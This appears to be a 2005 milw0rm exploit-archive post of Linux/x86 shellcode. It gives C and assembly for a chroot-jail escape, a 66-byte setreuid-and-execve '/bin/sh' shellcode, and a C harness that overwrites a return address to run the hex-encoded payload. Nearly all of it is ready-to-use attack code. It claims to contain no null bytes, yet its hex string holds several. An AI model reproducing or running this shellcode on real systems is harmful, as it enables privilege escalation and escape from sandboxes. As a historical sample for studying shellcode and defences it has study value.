android x86 chroot,linux/x86 chroot & standart 66 bytes

Linux/x86 chroot and standart shellcode.

By Okti (http://okti.nm.ru)

----------------------------------------------------------------------------------------------

/* Mkdir and Chroot are written in C: */

#include<stdio.h>

#include<unistd.h>

#include<sys/types.h>

#include<sys/stat.h>

int main(void) {

mkdir("sh", 0);

chown("sh", 0, 0);

chmod("sh", S_IRUSR | S_IWUSR);

chroot("sh");

/* But many '../' as possible, i'm to lazy to add comments ;) */

chroot("../../../../../../../../../../../../../../../../../../../../../../../../");

}

----------------------------------------------------------------------------------------------

Asm version of the above C code:

----------------------------------------------------------------------------------------------

.file"y.c"

.section.rodata

.LC0:

.string"sh"

.align 4

.LC1:

.string"../../../../../../../../../../../../../../../../../../../../"

.text

.globl main

.typemain, @function

main:

pushl%ebp

movl%esp, %ebp

subl$8, %esp

andl$-16, %esp

movl$0, %eax

addl$15, %eax

addl$15, %eax

shrl$4, %eax

sall$4, %eax

subl%eax, %esp

subl$8, %esp

pushl$0

pushl$.LC0

callmkdir

addl$16, %esp

subl$4, %esp

pushl$0

pushl$0

pushl$.LC0

callchown

addl$16, %esp

subl$8, %esp

pushl$384

pushl$.LC0

callchmod

addl$16, %esp

subl$12, %esp

pushl$.LC0

callchroot

addl$16, %esp

subl$12, %esp

pushl$.LC1

callchroot

addl$16, %esp

leave

ret

.sizemain, .-main

.section.note.GNU-stack,"",@progbits

.ident"GCC: (GNU) 3.4.1 (Mandrakelinux 10.1 3.4.1-4mdk)"

------------------------------------------------------------------------------------------------

Standart setreuid and execve shellcode (66 bytes).

It is all clean and tidy, uses 'pop' and 'push', to get string '/bin/sh' from data segment,

no null bytes.

For details, compile this asm code with: nasm -f elf shell.asm then ld shell.o and ./a.out

------------------------------------------------------------------------------------------------

section .data

db '/bin/sh'

global _start

_start:

; setruid(uid_t ruid, uid_t euid)

xor eax, eax

mov al, 70

xor ebx, ebx

xor ecx, ecx

int 0x80

jmp two

one:

pop ebx

; execve(const char *filename, char *const argv[], char *const envp[])

xor eax, eax

mov [ebx+7], al

mov [ebx+8], ebx

mov [ebx+12], eax

mov al, 11

lea ecx, [ebx+8]

lea edx, [ebx+12]

int 0x80

two:

call one

db '/bin/sh'

---------------------------------------------------------------------------------------------------

Hex opcodes of the mkdir chroot and above shellcode asm instructions (in C).

---------------------------------------------------------------------------------------------------

#include<stdio.h>

#include<stdlib.h>

int main() {

int *ret;

long offset = 4;

char star[] =

"\x89\xda\x8b\x4c\x24\x08\x8b\x5c\x24\x04\xb8\x27\x00\x00\x00\xcd\x80"

"\x89\xda\x8b\x5c\x24\x04\xb8\x3d\x00\x00\x00\xcd\x80"

"\x2f\x62\x69\x6e\x2f\x73\x68\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd"

"\x80\xe9\x16\x00\x00\x00\x5b\x31\xc0\x88\x43\x07\x89\x58\x08\x89"

"\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff"

"\xff\x2f\x62\x69\x6e\x2f\x73\x68";

*((int * ) &ret + offset) = (int) star;

}

// milw0rm.com [2005-07-11]